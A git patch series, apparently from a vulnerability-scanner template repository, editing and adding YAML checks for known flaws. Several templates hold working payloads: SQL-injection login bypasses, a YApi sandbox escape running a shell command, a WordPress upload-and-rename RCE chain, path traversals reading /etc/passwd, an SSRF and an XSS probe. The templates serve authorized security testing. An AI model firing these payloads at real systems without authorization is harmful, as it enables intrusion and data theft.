610c0e676f..d0dcd358f6 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -11,14 +11,10 @@ requests: - | POST /login.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Referer: http://{{Hostname}}/login.php + Referer: {{BaseURL}}/login.php Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 - Connection: keep-alive - Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1 diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml index 5fc0d294da..92f0058339 100644 --- a/vulnerabilities/other/yapi-rce.yaml +++ b/vulnerabilities/other/yapi-rce.yaml @@ -16,61 +16,43 @@ requests: - | # REQUEST 1 POST /api/user/reg HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 94 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/json, text/plain, */* - Accept-Encoding: gzip - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 106 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 89 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 382 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip cookie-reuse: true extractors: diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml index a67e1f1177..f8e73a2cf6 100644 --- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -13,10 +13,7 @@ requests: - | GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive matchers: - type: word diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index 68e0db9695..fbc1e03821 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -11,15 +11,11 @@ requests: - | POST /zms/admin/index.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Origin: http://{{Hostname}} - Connection: close - Referer: http://{{Hostname}}/zms/admin/index.php - Cookie: PHPSESSID=s22oss00i0ob4hcnsgkobb9r7p - Upgrade-Insecure-Requests: 1 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/zms/admin/index.php + Cookie: PHPSESSID={{randstr}} username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= diff --git a/vulnerabilities/rocketchat/unauth-message-read.yaml b/vulnerabilities/rocketchat/unauth-message-read.yaml index 981b5ee0e5..0041ad36f2 100644 --- a/vulnerabilities/rocketchat/unauth-message-read.yaml +++ b/vulnerabilities/rocketchat/unauth-message-read.yaml @@ -14,12 +14,8 @@ requests: POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - X-Requested-With: XMLHttpRequest Content-Type: application/json - User-Agent: Ophion SecurityGroup Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"} @@ -27,11 +23,7 @@ requests: POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close Content-Type: application/json - User-Agent: Ophion SecurityGroup - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"} diff --git a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml index 1f8a3bb2db..ab2d3656d9 100644 --- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml +++ b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml @@ -12,22 +12,13 @@ requests: - | GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 - Connection: close - | POST / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index 481c5d6f76..eec6c6f958 100644 --- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml @@ -15,8 +15,6 @@ requests: POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - Content-Length: 693 Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2 --6985fa39c0698d07f6d418b37388e1b2 @@ -45,11 +43,7 @@ requests: - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.25.1 Accept: */* - Connection: close - X-Requested-With: XMLHttpRequest - Content-Length: 81 Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php @@ -58,7 +52,6 @@ requests: GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index 402dc8c283..eb070bb0f2 100644 --- a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -11,18 +11,12 @@ requests: - | POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 - Content-Length: 241 Origin: null - Connection: close - Upgrade-Insecure-Requests: 1 -----------------------------77916619616724262872902741074 - Content-Disposition: form-data; name="upload"; filename="a.txt" + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt" Content-Type: text/plain Test -----------------------------77916619616724262872902741074-- diff --git a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index a0a6785d10..7075c485bf 100644 --- a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -11,11 +11,7 @@ requests: - | POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 Host: {{Hostname}} - Accept-Language: en - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 158 - Connection: close action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com From 6fee9b2b1beea8019f3464b821ce2dd74967bbea Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 Sep 2021 17:48:54 +0530 Subject: [PATCH 2090/4083] Create python-metrics.yaml --- misconfiguration/python-metrics.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 misconfiguration/python-metrics.yaml diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml new file mode 100644 index 0000000000..6ff4afb35d --- /dev/null +++ b/misconfiguration/python-metrics.yaml @@ -0,0 +1,27 @@ +id: python-metrics + +info: + name: Detect Python Exposed Metrics + author: dhiyaneshDK + severity: low + description: Information Disclosure of Garbage Collection + tags: exposure,devops + reference: https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + condition: and + words: + - "python_gc_objects_collected_total" + - "python_info" + + - type: status + status: + - 200 From 85adcd95beb3c53cfb3b6c7a35c9adf8b8d5620b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 Sep 2021 17:58:43 +0530 Subject: [PATCH 2091/4083] Update python-metrics.yaml --- misconfiguration/python-metrics.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml index 6ff4afb35d..047cbfd1b5 100644 --- a/misconfiguration/python-metrics.yaml +++ b/misconfiguration/python-metrics.yaml @@ -6,8 +6,10 @@ info: severity: low description: Information Disclosure of Garbage Collection tags: exposure,devops - reference: https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - + reference: + - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 + - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c + requests: - method: GET path: From 664ac520656aedcbcf49fa9255117cf0c40b6044 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 Sep 2021 18:09:15 +0530 Subject: [PATCH 2092/4083] Update python-metrics.yaml --- misconfiguration/python-metrics.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml index 047cbfd1b5..65dcbe3063 100644 --- a/misconfiguration/python-metrics.yaml +++ b/misconfiguration/python-metrics.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c - + requests: - method: GET path: From 39a0ffd0a554697564428245d41f543f08f5213e Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 8 Sep 2021 18:19:15 +0530 Subject: [PATCH 2093/4083] Update python-metrics.yaml --- misconfiguration/python-metrics.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml index 65dcbe3063..593b019435 100644 --- a/misconfiguration/python-metrics.yaml +++ b/misconfiguration/python-metrics.yaml @@ -6,9 +6,9 @@ info: severity: low description: Information Disclosure of Garbage Collection tags: exposure,devops - reference: - - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c + reference: + - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 + - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c requests: - method: GET From 8828d0f2ed2d385f1534bc284f5114f10b8e59bc Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 9 Sep 2021 06:44:20 +0700 Subject: [PATCH 2094/4083] Create CVE-2010-1719.yaml --- cves/2010/CVE-2010-1719.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1719.yaml diff --git a/cves/2010/CVE-2010-1719.yaml b/cves/2010/CVE-2010-1719.yaml new file mode 100644 index 0000000000..b41a153cae --- /dev/null +++ b/cves/2010/CVE-2010-1719.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1719 + +info: + name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12233 + - https://www.cvedetails.com/cve/CVE-2010-1719 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From bbf4f2ffebade1a49f488b1a19c9f2370125b0f6 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 9 Sep 2021 09:25:04 +0700 Subject: [PATCH 2095/4083] Updates severity --- default-logins/frps/frp-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-credentials.yaml index f096e880f6..605d43a20e 100644 --- a/default-logins/frps/frp-default-credentials.yaml +++ b/default-logins/frps/frp-default-credentials.yaml @@ -3,7 +3,7 @@ id: frp-default-credentials info: name: Frp Default credentials author: pikpikcu - severity: info + severity: high tags: frp,default-login reference: https://github.com/fatedier/frp/issues/1840 From 6a75ff9242dbe9d179dd0e46ce39f9ae944853ed Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 9 Sep 2021 01:28:04 -0300 Subject: [PATCH 2096/4083] Create confluence-detector.yaml --- technologies/confluence-detector.yaml | 39 +++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 technologies/confluence-detector.yaml diff --git a/technologies/confluence-detector.yaml b/technologies/confluence-detector.yaml new file mode 100644 index 0000000000..a418291693 --- /dev/null +++ b/technologies/confluence-detector.yaml @@ -0,0 +1,39 @@ +id: confluence-detector + +info: + name: confluence detector + author: philippedelteil + severity: info + description: Allows you to detect Atlassian Confluence instances + tags: confluence + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/pages" + - "{{BaseURL}}/confluence" + - "{{BaseURL}}/wiki" + + redirects: true + stop-at-first-match: true + matchers-condition: or + + matchers: + - type: word + words: + - '-Confluence-' + - '-confluence-' + part: header + condition: or + + - type: word + words: + - 'confluence-base-url' + part: body + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Atlassian Confluence ([a-z0-9-._]+)' From 9169fe37055a9c222c8115abecaa2cb7e0502b6a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 11:31:44 +0530 Subject: [PATCH 2097/4083] Update and rename confluence-detector.yaml to confluence-detect.yaml --- ...nfluence-detector.yaml => confluence-detect.yaml} | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) rename technologies/{confluence-detector.yaml => confluence-detect.yaml} (82%) diff --git a/technologies/confluence-detector.yaml b/technologies/confluence-detect.yaml similarity index 82% rename from technologies/confluence-detector.yaml rename to technologies/confluence-detect.yaml index a418291693..168a3b1f53 100644 --- a/technologies/confluence-detector.yaml +++ b/technologies/confluence-detect.yaml @@ -1,11 +1,11 @@ -id: confluence-detector +id: confluence-detect info: - name: confluence detector - author: philippedelteil + name: Confluence Detect + author: philippedelteil severity: info description: Allows you to detect Atlassian Confluence instances - tags: confluence + tags: tech,confluence requests: - method: GET @@ -17,8 +17,7 @@ requests: redirects: true stop-at-first-match: true - matchers-condition: or - + matchers-condition: and matchers: - type: word words: @@ -31,6 +30,7 @@ requests: words: - 'confluence-base-url' part: body + extractors: - type: regex part: body From 43b45a7b631b41ad4a3e0d5617ce0593d79db057 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 11:42:52 +0530 Subject: [PATCH 2098/4083] Update CVE-2020-12720.yaml --- cves/2020/CVE-2020-12720.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-12720.yaml b/cves/2020/CVE-2020-12720.yaml index 092f2de376..289db507b6 100644 --- a/cves/2020/CVE-2020-12720.yaml +++ b/cves/2020/CVE-2020-12720.yaml @@ -13,6 +13,7 @@ requests: - | POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1 Host: {{Hostname}} + X-Requested-With: XMLHttpRequest Accept: */* Content-Type: application/x-www-form-urlencoded From 90eba9d88358fd387c564fe1b2cddd0ff729c860 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 11:46:54 +0530 Subject: [PATCH 2099/4083] Update CVE-2020-7961.yaml --- cves/2020/CVE-2020-7961.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index d88be8f1b8..9f314f0f40 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -7,6 +7,7 @@ info: tags: cve,cve2020,rce,liferay description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). reference: + - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 @@ -43,4 +44,4 @@ requests: part: body regex: - "Microsoft Windows (.*)" - - "Distributor ID: (.*)" \ No newline at end of file + - "Distributor ID: (.*)" From 1f0b584bc8dda34f21261aa9314a27b0a744d099 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 12:03:47 +0530 Subject: [PATCH 2100/4083] Update flir-ax8-default-credentials.yaml --- default-logins/flir/flir-ax8-default-credentials.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/default-logins/flir/flir-ax8-default-credentials.yaml b/default-logins/flir/flir-ax8-default-credentials.yaml index 20db518552..3f011e9350 100644 --- a/default-logins/flir/flir-ax8-default-credentials.yaml +++ b/default-logins/flir/flir-ax8-default-credentials.yaml @@ -4,7 +4,7 @@ info: name: Flir Default Credentials author: pikpikcu severity: medium - tags: default-login,flir + tags: default-login,flir,camera,iot requests: - raw: @@ -33,4 +33,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 08dac5638513f39d39dc26b468da8642d3be96e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 12:06:24 +0530 Subject: [PATCH 2101/4083] Update simple-employee-rce.yaml --- vulnerabilities/other/simple-employee-rce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml index b9fc3b354d..f965f9f0b6 100644 --- a/vulnerabilities/other/simple-employee-rce.yaml +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.exploit-db.com/exploits/49596 - tags: rce + tags: rce,intrusive requests: - raw: @@ -13,6 +13,7 @@ requests: POST /dashboard/uploadID.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 + X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 -----------------------------5825462663702204104870787337 From 576499034d0a871894b555320fb7d06c18d65831 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 12:09:13 +0530 Subject: [PATCH 2102/4083] Update wordpress-rce-simplefilelist.yaml --- vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index eec6c6f958..60be402e20 100644 --- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml @@ -7,7 +7,7 @@ info: reference: https://wpscan.com/vulnerability/10192 description: | The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - tags: wordpress,wp-plugin,rce + tags: wordpress,wp-plugin,rce,intrusive requests: - raw: @@ -43,6 +43,7 @@ requests: - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} + X-Requested-With: XMLHttpRequest Accept: */* Content-Type: application/x-www-form-urlencoded From 732f5e95ac9766c48d6b8d9f2cca0bba1050235d Mon Sep 17 00:00:00 2001 From: lu4nx Date: Thu, 9 Sep 2021 16:14:08 +0800 Subject: [PATCH 2103/4083] Add: TiDB Native password bruteforce check plugin --- network/tidb-native-cred-bruteforce.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 network/tidb-native-cred-bruteforce.yaml diff --git a/network/tidb-native-cred-bruteforce.yaml b/network/tidb-native-cred-bruteforce.yaml new file mode 100644 index 0000000000..6344da325e --- /dev/null +++ b/network/tidb-native-cred-bruteforce.yaml @@ -0,0 +1,19 @@ +id: tidb-native-password-bruteforce + +info: + name: TiDB DB with enabled native password + author: lu4nx + severity: info + tags: network,tidb,bruteforce,database + description: TiDB is fully compatible with the MySQL 5.7 protocol and the common features and syntax of MySQL 5.7. TiDB instance with enabled native password support prone vulnerable for password brute-force attack. + +network: + - host: + - "{{Hostname}}" + - "{{Hostname}}:4000" + + matchers: + - type: word + words: + - "mysql_native_password" + - "TiDB" From 6e98cbf67eef1bf528e336604fee59966be6e1be Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 9 Sep 2021 16:18:16 +0700 Subject: [PATCH 2104/4083] Create CVE-2010-1308.yaml --- cves/2010/CVE-2010-1308.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1308.yaml diff --git a/cves/2010/CVE-2010-1308.yaml b/cves/2010/CVE-2010-1308.yaml new file mode 100644 index 0000000000..991bc53f66 --- /dev/null +++ b/cves/2010/CVE-2010-1308.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1308 + +info: + name: Joomla! Component SVMap 1.1.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12066 + - https://www.cvedetails.com/cve/CVE-2010-1308 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 6ce33e2f47bbf7306b59de1e8b0a926b9172b90a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 15:01:35 +0530 Subject: [PATCH 2105/4083] Rename phpwiki-lfi.yaml to vulnerabilities/other/phpwiki-lfi.yaml --- phpwiki-lfi.yaml => vulnerabilities/other/phpwiki-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename phpwiki-lfi.yaml => vulnerabilities/other/phpwiki-lfi.yaml (100%) diff --git a/phpwiki-lfi.yaml b/vulnerabilities/other/phpwiki-lfi.yaml similarity index 100% rename from phpwiki-lfi.yaml rename to vulnerabilities/other/phpwiki-lfi.yaml From 02e6ccfd7e27e31c232593a5a939f7623f90f7b3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 9 Sep 2021 19:48:08 +0700 Subject: [PATCH 2106/4083] Create CVE-2018-15535.yaml --- cves/2018/CVE-2018-15535.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-15535.yaml diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml new file mode 100644 index 0000000000..5c53de530e --- /dev/null +++ b/cves/2018/CVE-2018-15535.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-15535 + +info: + name: Responsive FileManager < 9.13.4 - Directory Traversal + author: daffainfo + severity: high + description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. + reference: + - https://www.exploit-db.com/exploits/45271 + - https://www.cvedetails.com/cve/CVE-2018-15535 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From bd24dc198e0988824f27886147c55cf1ca949c08 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 9 Sep 2021 19:08:13 +0530 Subject: [PATCH 2107/4083] Coverage for all templates using tags --- cves/2020/CVE-2020-12800.yaml | 1 + cves/2020/CVE-2020-13167.yaml | 4 +++- cves/2021/CVE-2021-3377.yaml | 1 + default-logins/minio/minio-default-password.yaml | 12 ++++++++---- .../prometheus-exposed-panel.yaml | 6 ++++-- exposures/configs/yii-debugger.yaml | 6 +++++- exposures/tokens/generic/shoppable-token.yaml | 1 + misconfiguration/front-page-misconfig.yaml | 1 + technologies/artica-web-proxy-detect.yaml | 4 ++++ technologies/basic-auth-detection.yaml | 1 + technologies/bigip-config-utility-detect.yaml | 1 + technologies/burp-api-detect.yaml | 1 + technologies/cacti-detect.yaml | 1 + technologies/clockwork-php-page.yaml | 2 ++ technologies/cockpit-detect.yaml | 1 + technologies/dell/dell-idrac6-detect.yaml | 2 ++ technologies/dell/dell-idrac7-detect.yaml | 2 